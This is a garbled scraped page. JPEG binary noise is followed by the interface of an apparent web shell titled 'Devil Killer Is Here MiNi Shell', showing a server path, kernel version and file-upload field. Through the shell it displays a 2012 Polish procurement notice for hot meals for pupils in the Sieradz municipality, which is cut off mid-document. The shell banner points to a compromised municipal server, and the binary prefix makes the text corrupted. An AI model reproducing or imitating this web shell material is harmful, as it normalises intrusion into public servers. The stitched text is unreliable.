JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120716/252734-N-2012.html

<p class="kh_header"><b>Sieradz: Przygotowanie i dostawa gorącego posiłku dla uczniów szkół podstawowych i gimnazjum z terenu gminy Sieradz w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 252734 - 2012; data zamieszczenia: 16.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Sieradzu , ul. Armii Krajowej 5, 98-200 Sieradz, woj. łódzkie, tel. 43 827 60 27, faks 43 827 60 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip-gops.ugsieradz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostawa gorącego posiłku dla uczniów szkół podstawowych i gimnazjum z terenu gminy Sieradz w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i dostawa gorącego  posiłku  dla uczniów szkół podstawowych i gimnazjum z terenu gminy Sieradz   w roku szkolnym 2012/2013.
Szczegółowy opis  przedmiotu  zamówienia  został    opisany w załączniku nr 1 do   Specyfikacji   Istotnych   Warunków Zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.10-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia warunek posiadania uprawnień  do wykonywania określonej działalności  lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, jeżeli  Wykonawca posiada  wdrożony System Analizy Zagrożeń i Krytyczny Punkt Kontroli (HACCP)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy                   i doświadczenia, jeżeli Wykonawca  w okresie ostatnich trzech lat  przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności  jest krótszy- w tym okresie, wykaże się wykonaniem (dla każdego zadania odrębnie) :  
a) Zadanie I 
co najmniej jednego zamówienie o charakterze żywienia zbiorowego i wartości co najmniej 30000,00 zł łącznie.
b) Zadanie II
co najmniej jednego zamówienie o charakterze żywienia zbiorowego i wartości co najmniej 10000,00 zł łącznie.
c) Zadanie III 
co najmniej jednego zamówienie o charakterze żywienia zbiorowego i wartości co najmniej 50000,00 zł łącznie
Uwaga: W przypadku składania ofert na więcej niż jedno zadanie, Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia, dysponowaniem odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia odrębnym dla każdego zadania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże się dysponowaniem (dla każdego zadania odrębnie) :  
a) Zadanie I - co najmniej jednym środkiem transportu do realizacji zamówienia w zakresie dostawy posiłków oraz dysponuje co najmniej 2 osobami  posiadającym uprawnienia i kwalifikacje w zakresie przestrzegania zasad higieny, wymagane od osób biorących udział w procesie produkcji i obrocie żywnością. 
b) Zadanie II - co najmniej jednym środkiem transportu do realizacji zamówienia w zakresie dostawy posiłków oraz dysponuje co najmniej 2 osobami posiadającym uprawnienia i kwalifikacje w zakresie przestrzegania zasad higieny, wymagane od osób biorących udział w procesie produkcji i obrocie żywnością.
c) Zadanie III - co najmniej jednym środkiem transportu do realizacji zamówienia w zakresie dostawy posiłków oraz dysponuje co najmniej 2 osobami posiadającym uprawnienia i kwalifikacje w zakresie przestrzegania zasad higieny, wymagane od osób biorących udział w procesie produkcji i obrocie żywnością. 
Uwaga: W przypadku składania ofert na więcej niż jedno zadanie, Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia, dysponowaniem odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia odrębnym dla każdego zadania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże się dysponowaniem (dla każdego zadania odrębnie) :  
a) Zadanie I - co najmniej jednym środkiem transportu do realizacji zamówienia w zakresie dostawy posiłków oraz dysponuje co najmniej 2 osobami  posiadającym uprawnienia i kwalifikacje w zakresie przestrzegania zasad higieny, wymagane od osób biorących udział w procesie produkcji i obrocie żywnością. 
b) Zadanie II - co najmniej jednym środkiem transportu do realizacji zamówienia w zakresie dostawy posiłków oraz dysponuje co najmniej 2 osobami posiadającym uprawnienia i kwalifikacje w zakresie przestrzegania zasad higieny, wymagane od osób biorących udział w procesie produkcji i obrocie żywnością.
c) Zadanie III - co najmniej jednym środkiem transportu do realizacji zamówienia w zakresie dostawy posiłków oraz dysponuje co najmniej 2 osobami posiadającym uprawnienia i kwalifikacje w zakresie przestrzegania zasad higieny, wymagane od osób biorących udział w procesie produkcji i obrocie żywnością. 
Uwaga: W przypadku składania ofert na więcej niż jedno zadanie, Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia, dysponowaniem odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia odrębnym dla każdego zadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w zakresie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy - Prawo zamówień publicznych (załącznik nr 5 do SIWZ)
2.Oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu   (załącznik nr  7 do SIWZ),
3.Oświadczenie, potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  (załącznik nr 8 do SIWZ),
4. Dokument z Państwowego Powiatowego Inspektoratu Sanitarnego potwierdzający  wdrożony systemu HACCP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip-gops.ugsieradz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Sieradzu 
ul. Armii Krajowej 5
98-200 Sieradz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Sieradzu 
ul. Armii Krajowej 5
98-200 Sieradz
pok. Nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie i dostawa gorącego posiłku dla uczniów Szkoły Podstawowej w Dąbrowie Wielkiej w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Przygotowanie i dostawa gorącego posiłku dla około 40 uczniów Szkoły Podstawowej w Dąbrowie Wielkiej w roku szkolnym 2012/2013. 
2. Wykonawca jest zobowiązany dostarczać posiłki  w specjalnych termosach służących do przewozu żywności, które spełniają wszelkie wymogi sanitarno-higieniczne. Ponadto musi posiadać pojazd do przewozu żywności dopuszczony do ruchu na podstawie aktualnej zgody sanepidu. Powyższe należy udokumentować decyzją o dopuszczeniu pojazdu w zakresie przewozu posiłków obiadowych w opakowaniach transportowych.
3. Wykonawca musi posiadać aktualną umowę na odbiór i unieszkodliwienie odpadów pokonsumpcyjnych.
4.  Zakres zamówienia obejmuje przygotowanie, dostawę i wydawanie posiłku w szkole w dni nauki szkolnej w godzinach od 10.45 do  11.00.
5. Posiłki należy wydawać w naczyniach jednorazowych wraz ze sztućcami.
6.  Zamawiający w placówce oświatowej udostępni Wykonawcy pomieszczenie kuchenne wraz z urządzeniami zaplecza kuchennego. Wykonawca jest zobowiązany do posprzątania po wydaniu posiłku.
7. Wydawanie posiłków powinno przebiegać w sposób umożliwiający zachowanie godności klienta.
8. Jadłospis  układany będzie przez Wykonawcę na okres 10 dni i dostarczany Zamawiającemu do wcześniejszego zatwierdzenia. Wszystkie zmiany w jadłospisie sugerowane Zamawiającemu będą wiążące dla Wykonawcy. 
9. Posiłki powinny być przygotowane zgodnie z zasadami racjonalnego żywienia. Muszą być  urozmaicone o wysokiej wartości odżywczej , atrakcyjne pod względem organoleptycznym, sporządzone wg zasad Instytutu Żywności i Żywienia w Warszawie.
10. Obiad powinien składać się z zupy z wkładką  mięsną z dodatkiem pieczywa lub drugiego dania. Zupa z wkładką może występować raz w tygodniu. 
11. Sposób przygotowania obiadu:
 a) zupy należy przygotowywać na wywarach jarskich (warzywnych)  lub mięsnych z dodatkiem głównego składnika, zupy na wywarach z kości w ograniczonych ilościach;
b) doprawianie zup nisko tłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką;
c) drugie danie powinno składać się  z produktów  białkowych, najlepiej pochodzenia zwierzęcego (mięso, ryby, drób- zamiennie), produktów bogatych  we węglowodany złożone (ziemniaki, kasze, kluski- zamiennie) oraz dodatków warzywnych (surówki, warzywa gotowane- zamiennie) plus kompot.
12. Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki  o charakterze prozdrowotnym poprzez: stosowanie tłuszczów roślinnych, - ograniczone stosowanie tłuszczów zwierzęcych, - umiarkowane stosowanie mięsa czerwonego, -stosowanie mięsa drobiowego, -stosowanie ryb, -umiarkowane stosowanie jaj, cukru, soli,- duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
13. Dostarczane posiłki muszą być gorące.
14. Posiłki wydawane będą po okazaniu imiennej listy sporządzonej przez pracownika Gminnego Ośrodka Pomocy Społecznej.
15. Wymaga się bezwzględnego przestrzegania przepisów higieniczno -sanitarnych podczas przygotowywania, transportu, wydawania posiłków oraz po ich wydaniu.
16. Zamawiający zastrzega, że ilość wydawanych posiłków może ulec zmianie o czym poinformuje Wykonawcę na 2 dni przed planowaną zmianą.
17. W cenie posiłku powinien zawierać się koszt jego przygotowania, dostawy i wydania.
18. W okresach comiesięcznych dostawa ciepłych posiłków rozliczana będzie  przez Wykonawcę, zgodnie z przekazaną do Gminnego Ośrodka Pomocy Społecznej fakturą VAT oraz załączoną imienną listą osób, którzy skorzystali z tej formy pomocy w danym miesiącu podpisaną przez dyrektora szkoły.
19. Zaleca się aby Wykonawca  dokonał wizji lokalnej lokalu, w którym będą przygotowywane     i wydawane posiłki oraz aby dokonał wizji lokalnej tras, którymi posiłki będą dostarczane do szkół na terenie gminy.
20. Wizji lokalnej Wykonawca dokonuje na własny koszt i ryzyko w celu uzyskania informacji, które mogą być konieczne do przygotowania ofert.
21.Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania spowoduje wykluczenie Wykonawcy z dalszego postępowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie i dostawa gorącego posiłku dla uczniów Szkoły Podstawowej w Kłocku w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Przygotowanie i dostawa gorącego posiłku dla około 17 uczniów Szkoły Podstawowej  w Kłocku w roku szkolnym 2012/2013. 
2. Wykonawca jest zobowiązany dostarczać posiłki  w specjalnych termosach służących do przewozu żywności, które spełniają wszelkie wymogi sanitarno-higieniczne. Ponadto musi posiadać pojazd do przewozu żywności dopuszczony do ruchu na podstawie aktualnej zgody sanepidu. Powyższe należy udokumentować decyzją o dopuszczeniu pojazdu w zakresie przewozu posiłków obiadowych w opakowaniach transportowych.
3. Wykonawca musi posiadać aktualną umowę na odbiór i unieszkodliwienie odpadów pokonsumpcyjnych.
4.  Zakres zamówienia obejmuje przygotowanie, dostawę i wydawanie posiłku w szkole w dni nauki szkolnej w godzinach od 11.15 do  11.30.
5. Posiłki należy wydawać w naczyniach jednorazowych wraz ze sztućcami.
6.  Zamawiający w placówce oświatowej udostępni Wykonawcy pomieszczenie kuchenne wraz z urządzeniami zaplecza kuchennego. Wykonawca jest zobowiązany do posprzątania po wydaniu posiłku.
7. Wydawanie posiłków powinno przebiegać w sposób umożliwiający zachowanie godności klienta.
8. Jadłospis  układany będzie przez Wykonawcę na okres 10 dni i dostarczany Zamawiającemu do wcześniejszego zatwierdzenia. Wszystkie zmiany w jadłospisie sugerowane Zamawiającemu będą wiążące dla Wykonawcy. 
9. Posiłki powinny być przygotowane zgodnie z zasadami racjonalnego żywienia. Muszą być  urozmaicone o wysokiej wartości odżywczej , atrakcyjne pod względem organoleptycznym, sporządzone wg zasad Instytutu Żywności i Żywienia w Warszawie.
10. Obiad powinien składać się z zupy z wkładką  mięsną z dodatkiem pieczywa lub drugiego dania. Zupa z wkładką może występować raz w tygodniu.
11. Sposób przygotowania obiadu:
 a) zupy należy przygotowywać na wywarach jarskich (warzywnych)  lub mięsnych z dodatkiem głównego składnika, zupy na wywarach z kości w ograniczonych ilościach;
b) doprawianie zup nisko tłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką;
c) drugie danie powinno składać się  z produktów  białkowych, najlepiej pochodzenia zwierzęcego (mięso, ryby, drób- zamiennie), produktów bogatych  we węglowodany złożone (ziemniaki, kasze, kluski- zamiennie) oraz dodatków warzywnych (surówki, warzywa gotowane- zamiennie) plus kompot.
12. Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki  o charakterze prozdrowotnym poprzez: stosowanie tłuszczów roślinnych, - ograniczone stosowanie tłuszczów zwierzęcych, - umiarkowane stosowanie mięsa czerwonego, -stosowanie mięsa drobiowego, -stosowanie ryb, -umiarkowane stosowanie jaj, cukru, soli,- duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
13. Dostarczane posiłki muszą być gorące.
14. Posiłki wydawane będą po okazaniu imiennej listy sporządzonej przez pracownika Gminnego Ośrodka Pomocy Społecznej.
15.Wymaga się bezwzględnego przestrzegania przepisów higieniczno -sanitarnych podczas przygotowywania, transportu, wydawania posiłków oraz po ich wydaniu.
16. Zamawiający zastrzega, że ilość wydawanych posiłków może ulec zmianie o czym poinformuje Wykonawcę na 2 dni przed planowaną zmianą.
17. W cenie posiłku powinien zawierać się koszt jego przygotowania, dostawy i wydania.
18. W okresach comiesięcznych dostawa ciepłych posiłków rozliczana będzie  przez Wykonawcę, zgodnie z przekazaną do Gminnego Ośrodka Pomocy Społecznej fakturą VAT oraz załączoną imienną listą osób, którzy skorzystali z tej formy pomocy w danym miesiącu podpisaną przez dyrektora szkoły.
19. Zaleca się aby Wykonawca  dokonał wizji lokalnej lokalu, w którym będą przygotowywane i wydawane posiłki oraz aby dokonał wizji lokalnej tras, którymi posiłki będą dostarczane do szkół na terenie gminy.
20. Wizji lokalnej Wykonawca dokonuje na własny koszt i ryzyko w celu uzyskania informacji, które mogą być konieczne do przygotowania ofert.
21. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania spowoduje wykluczenie Wykonawcy z dalszego postępowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
